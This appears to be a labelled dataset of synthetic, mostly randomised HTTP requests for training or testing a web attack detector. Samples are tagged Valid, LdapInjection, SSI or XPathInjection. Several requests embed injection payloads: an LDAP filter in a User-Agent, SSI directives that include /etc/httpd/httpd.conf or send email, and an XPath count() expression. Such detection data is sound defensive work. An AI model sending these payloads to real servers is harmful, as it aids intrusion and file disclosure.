GET /qM@dwRDp1ETg/pak7e/soheoaecnrhr7c/Ee9heoeqlnsir/liqhe/0OT/c_Xiu1qt7z.P0RR/aymssluotna.jpeg?opwdenetql=wduCtTdw6YY&GbhF9y.yurG=Qt2r3r&HcYV.U9=07662&AQGvmailE=5aEu-iftpHds&ql=wdmdiFlib&tlften=g6iIQ7w&i3dBhli=ehB-a1J%40&brncWiframetmpA3HILR=1 HTTP/1.0
Host: www.tmOt2a.be:80
Connection: close
Accept: video/*, video/mpeg
Accept-Charset: windows-1254;q=0.2, euc-jp, iso-8859-9;q=0.4
Accept-Encoding: 
Accept-Language: i5etAnii-Oeet;q=0.9, RslR-diX;q=0.9, iy-aa9;q=0.2, v-9hst;q=0.3
Cache-Control: min-fresh=228
Client-ip: 15.51.184.61
Cookie: nudreiDoan=l6.FlM1c8;qtY9eOkkmd= lfLre[2pm2c(E;Zgroup byAoptm9window.openTcxu=8595604;B2he=ldiEg
Cookie2: $Version="1"
Date: Mon, 11 Jan 10 04:06:06 GMT
ETag: W/"lsBUJ6tUgc9GNHK@EM"
Expect: 100-continue
From: onjJtaeo@rtkFe9o2gi.st
If-Modified-Since: Fri, 09 May 08 09:31:21 UTC
If-Unmodified-Since: Mon, 03 Mar 08 17:07:22 CET
If-Match: *
If-None-Match: "v8sSexrVJOXAJSSR"
If-Range: "jxyFhrt@Hjj.wtQMG"
Max-Forwards: 2
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: cqliad ydYennje=qeoJcce
Authorization: NTLM U3Nld2VnZ2dmeDVzMGpzdFcxbnNvbmRlaWVhZXM3a29TYW11dGVsSTB0dDZ0
Range: 5570-,706880-3
Referer: /oe8Ne3i/zshe0d.pl
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 2.9; Rh-Nh; rv:9.5.1) Gecko/98197758
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 096x0326
Via: HTTP/0.1 136.155.227.4, HTTP/9.6 123.47.137.22
Transfer-Encoding: gzip
Upgrade: ofesrr/6.5, wiTer/0.7
Warning: 835 www.A01s.js "hdtheryfnaiEj" 
X-Forwarded-For: 65.12.255.69
X-Serial-Number: 247588514847366
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 26105
Start - Id: 18072
class: Valid
GET /dzOXb/iJH.js?MBQTzfpassthrucIplibT=675731&oo=152776&_DTI=5932143&h07iqpltnuHows=8698778&uce=fs&bc=+cmm%5Beh%28dhavingxh&swKfanaqcdruq72=ctNae4svwsLair HTTP/1.1
Host: www.efh3dos0.com
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=5583
Client-ip: 211.175.152.169
Cookie: w81n=ohuo;zK7lsopen5plikeGW=nmmanano
Cookie2: $Version="008"
Date: Tue, 08 Mar 05 24:17:41 CET
ETag: W/"NZxbFVmdZTGr7PoD63-"
Expect: ncAe=p7naltx;6z6ac=dnSam2
From: bkly@gN1itutinI.de
If-Modified-Since: Tue, 09 Sep 08 07:56:56 UTC
If-Unmodified-Since: Mon, 02 Feb 09 02:34:59 UTC
If-Match: "mwzXyWFj0GISoxOdKWs4"
If-None-Match: *
If-Range: "wme5B43QYs31S0-"
Max-Forwards: 031
MIME-Version: 3.6
Pragma: nbotuitk=vu4ey
Proxy-Authorization: Basic TjVob3YybjphdHRpYmRhbw==
Authorization: NTLM RXRhRUlMdGQ0bWVjT2lnYWVzZmQxb284VWxhYW5zc2Uzd2pybWU=
Range: 955815-429,91164-5504
Referer: http://www.edha.gov/3oo28/i0uh.mspx
TE: trailers
Trailer: If-Match
User-Agent: wnav5rittO
UA-CPU: MIPS
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: FTP/8.6 www.ltrore0.html
Transfer-Encoding: edSt; aeAsm1=ysgnEw
Upgrade: pcVooi/8.0, teny6/2.3
Warning: 734 www.ernreSI.shtml "fig7ndengta3" 
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 507009022926065
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18072
Start - Id: 17552
class: Valid
GET /aeDlrBls/GinsertU5AxG/Unetcatwinnt/YabM_yNFi_Gp/cZEhl/gjVO4Xw8z/gdielotpaxlqne/titenSt3/8kRtkjEvzgL.shtml?rn6q=4301&Tw0sfaptid=e0ddsn7&Eg9scriptF=lsber2tdLet%40&i2jt1zhxredhrf=nIOHCDKs6GM4&alszedA7zLrsv=jnsrmsl&6ftop1R5ndL=6141258&hos3namwTsta=0 HTTP/1.0
Host: www.brnlagsmiC.it
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-950
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=67883
Client-ip: 130.134.24.111
Cookie: RpositionsWHgroup by0CRG=h|'es]b-c7;nhoaodlm3s=xtermndivaccess_logt)e8tpositionboot.ini;4stxakdofosd=4098
Cookie2: $Version="90"
Date: Mon, 07 Jul 08 15:56:12 CET
ETag: W/"2n4j4zLh1TacBCC6jf"
Expect: 100-continue
From: noim@o36slone.be
If-Modified-Since: Sat, 25 Sep 04 24:46:32 GMT
If-Unmodified-Since: Sat, 05 Jul 08 10:02:41 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 06:59:51 CET
Max-Forwards: 8173
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/hlsmf/elihchu/rrenbd.png
Authorization: usobak aruWyt=Eohf1me1
Range: -848823,71971-191917
Referer: /jmlsnau5/lmAIoon/oDamaE9e.nsf
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/3.3 (compatible; MSIE 9.5; Linux i586; Aeskx; ikem0; fbnd)
UA-CPU: StrongARM
UA-Disp: 033,9220,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 845x6872
Via: FTP/1.8 101.7.63.121, FTP/5.1 80.105.31.185
Transfer-Encoding: identity
Upgrade: qnef/6.1, teHndi/9.7, n5GAtw/8.0, Epe/2.3
Warning: 064 www.mgwo.jpeg "tuga" 
X-Forwarded-For: 235.147.93.170
X-Serial-Number: 8998788877117234588
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17552
Start - Id: 37342
class: LdapInjection
GET /ltIe9nHkH4HKX/noeevngvomfM3A/euBU8/dzwXK/likerlL85/bgsoundBchild@qwindow.openwE/s9teev/Aoefjt1bLybh02rin2h.png?0AZ1k5iv1xzp=339967&trfpv=osise%28s%3BeIi%2BN3dgwcsd&hr=romW7MlB HTTP/1.1
Host: 20.48.167.171
Connection: vtAo
Accept: */*;q=0.8
Accept-Charset: iso-8859-5, iso-8859-6, x-mac-turkish;q=0.6
Accept-Encoding: 
Accept-Language: dyna-if6et1;q=0.1, nl-geet;q=0.1, t6mS3m-ttso;q=0.4, eTOc-lt;q=0.4
Cache-Control: min-fresh=06
Client-ip: 183.224.73.87
Cookie: fcjoydip=ecrdgns;urq4=we@a?thaving;imp0dom
Cookie2: $Version="7"
Date: Thu, 14 Feb 08 11:24:10 GMT
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: elbo@eieuetfntT.fr
If-Modified-Since: Tue, 08 Jun 04 08:57:59 CET
If-Unmodified-Since: Fri, 31 Mar 06 18:16:10 UTC
If-Match: "zkoHilhRy4kTrL8q"
If-None-Match: *
If-Range: "U9sICyoJWi@jK-N"
Max-Forwards: 8
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: sbiEot nwriuts=lux1
Range: -04795,-66
Referer: http://eF7mmeho.com/coqo6u/cdwBsQ6E/keRnjEl.mpg
TE: deflate
Trailer: Range
User-Agent: ")(targetfilter=(o=NetscapeRoot))
UA-CPU: 68000
UA-Disp: 654,6538,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: 5.1 43.204.2.147, 4.9 65.221.101.245
Transfer-Encoding: compress
Upgrade: o3106M/9.9, E9rle4/4.1, oohnne/6.6, eelrde/4.9, Ix7ea/1.8
Warning: 830 www.ane2.html:1 "vjdynls" "Sun, 23 Nov 08 23:13:16 CET"
X-Forwarded-For: 172.124.5.186
X-Serial-Number: 06549032
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37342
Start - Id: 39773
class: SSI
GET /TkQQlgwLn4p/zk/u6e4it/FOZkcVconnect/xhrliahtplneohebeS/uG73OsaZXYiN/naebzkdeihnI/rgRtso/fyEbbkp./svoo0eu9WdTZWVy7/anq.pl?zilrlts=62&nnAh0ks=aWotoay16naccDala&n1yum=8330&ireirceinne=mhas&seqdtc=nsaiNTu&tyadohejiaixe1s=tadnNtusnml&qKpJscript=ewgetibwzm&btora3p=b6ewtlexlny&tiRst3ahrhsi3=hednLthof+z0amR%28w&rak=rltRb%2Blibnsetarr&7srenrEahddy6ss=767907&aibache=fivX&enedragrt=%3C%21--%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&Eiioez4r=6%40x_ HTTP/1.1
Host: www.hamremhi.net
Connection: stHtyi
Accept: */*
Accept-Charset: iso-2022-kr;q=0.1, iso-8859-6;q=0.2, iso-2022-jp, x-mac-ce;q=0.1
Accept-Encoding: *
Accept-Language: eo7cSe-kidtm;q=0.2, ieeuutt-sacYBeh, Ecl-h, tpyltp-sctaobeo;q=0.2
Cache-Control: s=ttoegdh
Client-ip: 211.6.11.10
Cookie: awgrrioueon2eo=579289890;MKLiDVikR=ns;memi9ae=7267738518
Cookie2: $Version="712"
Date: Mon, 02 May 05 09:22:31 GMT
ETag: W/"16rXq6CpTaDcd-iF"
Expect: 100-continue
From: 6Rvlor@tljncre.cz
If-Modified-Since: Fri, 08 Sep 06 13:53:33 GMT
If-Unmodified-Since: Sun, 19 Jun 05 24:51:32 UTC
If-Match: *
If-None-Match: "nRzVkoSLpeL56v1"
If-Range: Mon, 19 Nov 07 01:25:07 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: lN='t4hepako'
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: Digest cnonce="aEEac"
Range: 42-82,601-32,-86
Referer: /txbn/dedh/7agyndL.tar.gz
TE: trailers,chunked
Trailer: Expect
User-Agent: Mozilla/4.2 (compatible; Konqueror/5.0; SunOS sun4u; nzaj; 5aideA; bfucTLaruS)
UA-CPU: 68000
UA-Disp: 168,5642,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 357x4433
Via: 5.2 251.113.131.179, thcsex/4.8 67.143.79.15:071
Transfer-Encoding: identity
Upgrade: Fcncth/8.5, tSieoY/0.0, qnbm/2.6, dla/6.1, tyuhob/1.6
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39773
Start - Id: 18428
class: Valid
GET /iMrptettajhdRleibwt/8joahn/mFc7NrIvlE3Fxg/qo/ltMer/oGa/-mCP8ftpz@BC/6zQQM-.lN5/bvealnfmxrkao/ysofaosea/9syae/sHWYAwkH.98TSS9.png?g5se=oR%7E0%3As HTTP/1.1
Host: 164.194.51.173:6048
Connection: keep-alive
Accept: audio/*;q=0.3, text/*, image/png
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.6, identity
Accept-Language: *;q=0.1
Cache-Control: a=aiiuuxe
Client-ip: 188.106.227.101
Cookie: Wrs3deskngeme=rmyntrB;htceeDusEdaO=rtN;EahCa=3;ostnmlsrmbrp3=775;sndoduMsixura=1670841;NgswO=32463
Cookie2: $Version="3"
Date: Tue, 17 Jun 08 17:14:14 CET
ETag: "MLsxUTIJ@Hd0@Mi-2"
Expect: iftEr5=soa9fL;oik4z=Suya
From: sen0esya@3Yt7.ch
If-Modified-Since: Thu, 22 Feb 07 21:12:34 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:59:22 GMT
If-Match: *
If-None-Match: "QQEGEuE_crC@mkZuXI2"
If-Range: Mon, 02 May 05 05:48:58 CET
Max-Forwards: 8305
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: sXeeoh rDswg=isec
Range: 039-,2756-53,000-768
Referer: http://nfHhtnm.fr/uee13ee/uouoTke/dlnmo/kan6.cgi
TE: trailers,deflate,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.1 (X11; U; Open BSD i586 6.4; En-t0; rv:4.0.5) Gecko/96095359
UA-CPU: MIPS
UA-Disp: 9580,4552,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4354x029
Via: 4.5 219.55.109.168, rrnses/6.1 196.6.98.229, 2.6 85.85.188.68
Transfer-Encoding: gzip
Upgrade: er0ua/3.6
Warning: 667 www.dfn3lro.gif "uson3n" 
X-Forwarded-For: 94.17.82.121
X-Serial-Number: 562102259881666351
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18428
Start - Id: 17067
class: Valid
GET /onuAQ-gC/sly8x2copygTtG/cZg.AwxbTn/sH-1gimc-h0fmD/aeCFIJ7/sol/qNbinPVnn4@c3wp-/Tefryn/mn64u7l0aueaenaaqT/6wSlN.aspx?waboeea4nrns0=passwderilutUo%25t&uRo1hqaLi=2329649&Ao9atane=385555&9laohDVamdnmnan=65655&wmgyt=+&mSheo=ec7eezoidc HTTP/1.0
Host: www.dwsi0.ch
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-8-i;q=0.9, iso-8859-8-i;q=0.6, x-mac-hebrew;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: isanuel=ttet
Client-ip: 144.22.96.142
Cookie: rrsalp=oc;aie=f5YZFFJ7gR;teAijy=iu&t zh<2ieinn;oeresteEtvcrg0=9;OhUftw_1AA=079
Cookie2: $Version="705"
Date: Mon, 12 Sep 05 12:34:26 CET
ETag: "kTi36ITcz6K1oO1G6m"
Expect: 100-continue
From: tCTeli@niOaihobe.biz
If-Modified-Since: Mon, 07 Nov 05 13:18:32 CET
If-Unmodified-Since: Mon, 26 Jul 04 09:48:57 CET
If-Match: *
If-None-Match: "2Rvidt6d_llla-Wpy89"
If-Range: Wed, 09 Dec 09 12:54:54 CET
Max-Forwards: 9
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic aHZzaGRuaU46cndvdGFk
Authorization: Basic eGhvY2t0b246Y3FjbmhpaG4=
Range: 36592-9391,93359-42748,61842-4696
Referer: http://www.aIyayBe.ch/eftt6xc/oeoerm.txt
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/4.9 (compatible; ieiimAx; WinNT; fi5tftffel; tSbTnrs)
UA-CPU: PowerPC
UA-Disp: 7520,867,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9333x8933
Via: 1.8 84.164.16.222:90
Transfer-Encoding: compress
Upgrade: eus/7.5
Warning: 375 86.158.86.115:9 "26woSveoan1creriz" 
X-Forwarded-For: 185.99.110.242
X-Serial-Number: 7467351348661149329
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17067
Start - Id: 39481
class: SSI
POST /vTzLYPNKprlognetcat./esf9ner/7i-perldJ/@LuqvYw4N/hm130LnLCvlI/rWJ.cN_Elq.vfb509/thhh/awtaaan/IoGndare5uannme2n6dt.php? HTTP/1.1
Content-Length: 165
Content-Language: Ee
Content-Encoding: gzip
Content-Location: http://www.insh.uk/pieeia/2ciene/0hsndrps/qan3tIne/8Zru9hhu.bin
Content-MD5: Z2huYmpuZGRyamVFdWlkZw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 23 Nov 04 24:13:19 GMT
Host: www.ea1iohen0.com:80
Connection: wjqS8E
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: ja4w-agrhA
Cache-Control: max-age=2475
Cookie: ttTtuIyejNNay5e=scHuIoge;6qinclude8GX=<!--#email fromhost="www.strqtEi.com" tohost="mailbox.Ij2fr.com" message="sbcgni eurMvw 5st bneta3" fromaddress="tfAjAe.com" toaddress="itots.enatl.com" subject="r" sender="arei.com" replyto="egbaor.com" cc="u1m" inreplyto="6lns irQe 8s0oe" id="aftcmmail" -->
Cookie2: $Version="2"
Date: Wed, 23 Aug 06 24:51:56 GMT
ETag: W/"I3Au.b4EtjYC-84W.XiO"
Expect: 100-continue
If-Modified-Since: Thu, 02 Oct 08 03:16:26 UTC
If-Unmodified-Since: Sun, 06 Feb 05 09:57:15 UTC
If-Match: "paCz_z3oBCVezhH"
If-Range: Sun, 28 Jan 07 07:25:56 CET
Max-Forwards: 37
MIME-Version: 6.7
Pragma: t=7lhttlT
Authorization: ele4s guje=erna
Referer: http://www.nebeoEat.gov/slzo/ixatunsu/naatd.php3
TE: trailers
Trailer: Cache-Control
User-Agent: aHjrHlon http://www.f8Cnn.gov
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 890x8709
Via: 4.2 www.cese.gif, 7.8 www.rUte1.tiff
Transfer-Encoding: identity
Upgrade: eot/2.1
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

riocrteherdaiin=1formate4&lars6iEizto9=geHeipR&ilRi=n msUobjectet@Tpusr3r?es '&pwegosjwseiil=1num6tiTYy0eq0uN&doe2ylh=fqhhpnt&a6EDgroup bytelnetq5J1nxml=214078

End - Id: 39481
Start - Id: 22017
class: Valid
GET /oXXEdV6IVv2n8IRH/ar91nsl/a90gfT6u@em@-dV96t7W/sEttr4riBtpVQuiO/onXB_qYB2OX34dqHtN/nK8M6pFwG/tQJnEa5tzq6uex3Iw7.mdb?PraIees3A=vOAcA&tEgomcPip8lewh=h5C_1 HTTP/1.1
Host: www.etien.biz
Connection: ts3o1ije
Accept: */*;q=0.8
Accept-Charset: windows-1250;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 166.123.70.154
Cookie: ioHyiigtm9wc=700158;t1anolamdltiroh=t ecatboot.iniriibgsoundih)t
Cookie2: $Version="498"
Date: Wed, 16 Aug 06 14:35:37 GMT
ETag: W/"D_OWrNmUVl_GNIDDi51"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Sat, 21 Jun 08 03:05:48 GMT
If-Unmodified-Since: Tue, 13 Feb 07 21:43:06 UTC
If-Match: "5usT_lRkXeSq2UL6h"
If-None-Match: *
If-Range: *
Max-Forwards: 365
MIME-Version: 1.6
Pragma: btrear0=gnd
Proxy-Authorization: Basic aWF2ZTpzZW5id09peQ==
Authorization: 6sB8at rohxrm=Hjabh
Range: -83545,-8754,2573-
Referer: /aadtsei/czuMsit/s8eS0hu.cfm
TE: gzip,trailers,deflate
Trailer: Trailer
User-Agent: r1_imQ1r http://www.pnlbac.gov
UA-CPU: Sparc
UA-Disp: 838,087,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 915x5252
Via: 0.0 56.132.50.42, inp/4.7 www.ss1t.html, HTTP/0.9 165.152.239.27
Transfer-Encoding: compress
Upgrade: nhrci/4.2, senbe/7.0, ts7f/4.6, hYylo/0.0, kvicaN/2.1
Warning: 409 www.rklthno.jpeg "2gidteht4e3rseoOd" 
X-Forwarded-For: 167.167.68.206
X-Serial-Number: 17735722865769564
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22017
Start - Id: 49954
class: XPathInjection
GET /nyIoArZR2IeZkHA-iTI/0izG9shutdownqm/3v/sJpS61yE/ibzb2uLIUTVu5dxjWgJ/ezleiioldrcq/aQCkDU-PLrxRPxLskOv/i2@xNucDaEU/VTIY@xlS0fj/iezgx1llnoa/o5eeie/laadmin8u8a5wrd3P9q.php?s0dlunhta2e=%28i++++%3C+count%28aot%2Fchild%3A%3Atext%28%29%29+++++and++++j+++++%3C+count%28enom%2Fchild%3A%3Acomment%28%29%29++++and+++k+%3C++++count%28rh%2Fchild%3A%3A*%29+++++%29&Aumelynemhiig=6998038110 HTTP/1.0
Host: www.hacmr.com
Connection: 5i5e
Accept: */*;q=0.6
Accept-Charset: iso-8859-8, iso-8859-15, windows-1250;q=0.7, isiri-3342, x-mac-cyrillic;q=0.6
Accept-Encoding: 
Accept-Language: so-ogm14kr2;q=0.2, pto-reetda
Cache-Control: no-transform
Client-ip: 6.57.199.123
Cookie: na6r=35908502;h0hkmol= 
Cookie2: $Version="9"
Date: Sat, 05 Feb 05 15:14:34 UTC
ETag: W/"Iy_DNmlUhoJDmsXeKRd"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Wed, 16 Apr 08 08:27:21 GMT
If-Unmodified-Since: Mon, 07 Mar 05 10:51:09 CET
If-Match: "g2sH@cRsy4dKvnb_"
If-None-Match: "zNX.NeWuwJFY-Fw."
If-Range: Thu, 07 Jul 05 13:36:03 CET
Max-Forwards: 89
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: http://eTDrotep.uk/btdtse0v/hd4mrb.php3
TE: trailers,deflate;q=0.2,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: emdxyiaao (aB9THq)
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 207x5488
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: wtev
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 43.162.129.161
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49954
Start - Id: 34406
class: Valid
PUT /9.RN/aE6r5IlpphtbYFRk/tqS3/srtdiknmc/ssB3FxPWbzoR/8cZq_Ozh.gif? HTTP/1.1
Content-Length: 281
Content-Language: mF
Content-Encoding: gzip
Content-Location: http://Oedhmf.net/atbs/cbuxnao/renEe.asmx
Content-MD5: NXNzSGltNGVnZW1yVHNvMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Jul 08 20:24:16 CET
Last-Modified: Sat, 20 Aug 05 12:15:48 UTC
Host: www.e5reljdey.de:929
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: tinls-stI;q=0.1
Cache-Control: only-if-cached
Client-ip: 245.163.168.164
Cookie: Nq0ntbtrtktts=959;4ta=t9ee1/sh;roozq=itTrabE
Cookie2: $Version="007"
Date: Wed, 23 Mar 05 07:44:51 UTC
ETag: W/"CakYtXFWHASt5_IdbQ"
Expect: emswa
From: 2deufai@s4utee.it
If-Modified-Since: Fri, 07 Mar 08 18:05:04 UTC
If-Unmodified-Since: Tue, 14 Oct 08 11:56:47 GMT
If-Match: *
If-None-Match: "pj8.bFuakd4bbhBXl"
If-Range: Sun, 14 Mar 10 03:56:22 CET
Max-Forwards: 3290
MIME-Version: 8.4
Pragma: LC0e0t='nse'
Proxy-Authorization: Basic bmc4UWM6c3lFNGZt
Authorization: Digest response="eA709d2CfcB1a1aCc2f2eb183D513510"
Range: -60,31-880618,-0430
Referer: /3tma/iid2/wawdof.asp
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.3 (Machintosh; U; PPC 3.3; l1-ii; rv:9.0.8) Gecko/38151373
UA-CPU: StrongARM
UA-Disp: 8099,2582,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 995x932
Via: FTP/6.4 157.192.70.148:0, FTP/5.6 www.blsinxo.jpg, 0.2 www.Ngssh.gif
Transfer-Encoding: gzip
Upgrade: uegc/4.0, wn9ad/1.0
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 212696659467412
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

ynlclgghsoovi=etra&eL=07813511&strsOci=4825&s8=5171642&nDa08rsaoohtc=linkin&VrtgA6M=2&WQ1i4mb20a5Gand=eIAWXz.jkk_X&ad=keysegaeOxe2a3hY&iiacsPrE=nnj&1f=98eW&dneld=heqrchildahavLosh&aeerer9e0ortnh=kni72Oobh1a1out1l0&erridn=-E&XM0v3NcxRT=kiuSTOnrSI.&mjieoaF95bSthhl=beUh9Iu s/rciCsl

End - Id: 34406
Start - Id: 17619
class: Valid
GET /rNOxmtot7itrl5h.swf? HTTP/1.0
Host: 156.253.53.153
Connection: mb4nclud
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=4032
Client-ip: 198.210.179.113
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="35"
Date: Thu, 25 Aug 05 15:22:40 GMT
ETag: W/"oWt@jwocm2BL8j1S4f"
Expect: 100-continue
From: croeol2e@tiEhh0b.de
If-Modified-Since: Fri, 16 Nov 07 01:55:01 CET
If-Unmodified-Since: Sat, 15 May 04 19:40:31 GMT
If-Match: "vEDnAcbPGtc3Bdf"
If-None-Match: *
If-Range: "DyRuL9MVdAPeS.Av"
Max-Forwards: 6338
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/ote8cdid.gif
Authorization: NTLM R2phWXhyRnROdHQ2ZW5zaGRvb2NlZWFlcmUzY3pTYWFSNDJhdGRlYWF1b29pcnQ=
Range: -948
Referer: /tsoa.asmx
TE: deflate,chunked
Trailer: Accept
User-Agent: Mozilla/5.5 (compatible; nse0eT; Mac OS X; wteuG7est; a9eckmtan; cerodstdf)
UA-CPU: MIPS
UA-Disp: 611,8955,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 519x8664
Via: FTP/2.5 240.206.221.3, iihg/3.6 242.16.23.61:01799, HTTP/3.8 141.125.146.15
Transfer-Encoding: deflate
Upgrade: H4s/6.5, syax/8.8
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 68.35.229.1
X-Serial-Number: 607664307
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17619
Start - Id: 5665
class: Valid
POST /b9Oyl25AM6QK0y/yJHOS/ighonyteun/iS1LUn_Vz/DIIQ4n/eresgL0nwtirulHus/2wtgf5/zR/unsngmmeohhy0t/9aixueveov6/eAteuHe.cgi? HTTP/1.1
Content-Length: 244
Content-Language: n,ievp,i
Content-Encoding: deflate
Content-Location: /xrlpbpr5/e6oeraHE.exe
Content-MD5: c2gwbG1pZW4xdWdzY2Vlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Nov 04 15:19:33 CET
Last-Modified: Fri, 03 Jul 09 13:59:35 UTC
Host: www.looep.org
Connection: close
Accept: */*
Accept-Charset: iso-8859-1, x-mac-arabic;q=0.9, iso-8859-1, windows-1253;q=0.3
Accept-Encoding: gzip, compress;q=0.1
Accept-Language: dKm-1ope, olutw-ein9y
Cache-Control: min-fresh=5966
Client-ip: 214.147.205.41
Cookie: 5ow4eiiyTiKn=mwa|e;hrmirscst4=connectP;epmtjhLmhxHsoJo=tMEOb@aqM;u2nuih4yqe=5Wltelnetek:i s3 ee
Cookie2: $Version="36"
Date: Tue, 13 Sep 05 23:11:58 UTC
ETag: W/"DPi.wP7IltBPY5R"
Expect: 100-continue
From: ccni6aX@tnttxanahc.uk
If-Modified-Since: Tue, 25 Nov 08 15:02:23 GMT
If-Unmodified-Since: Mon, 14 Apr 08 12:18:12 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 535
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: 5emer ephane=n6oq
Authorization: Basic eXFpdGw6aW1udHNu
Range: 8237-7,80-5013
Referer: http://oeqdctee.net/rdhtle/ketti/obs18tee/eIsaag/Vhenuwr.aspx
TE: deflate,gzip;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.6 (X11; U; Linux i386 8.3; ns-ij; rv:9.5.7) Gecko/57791045
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 327x1132
Via: 6.2 www.tPhjtic.js, 5saI/7.7 115.116.140.141:8847, anou3/1.3 www.l3bru.shtml
Transfer-Encoding: compress
Upgrade: nHtj/5.7, henx/4.4
Warning: 184 www.hsYw.gif:851 "aIim8iDdcu9elerauinn" "Sun, 05 Apr 09 08:26:23 UTC"
X-Forwarded-For: 214.6.127.164
X-Serial-Number: 59672
----: -----------------------
~~~~~: ~~~~~~~~~~~~

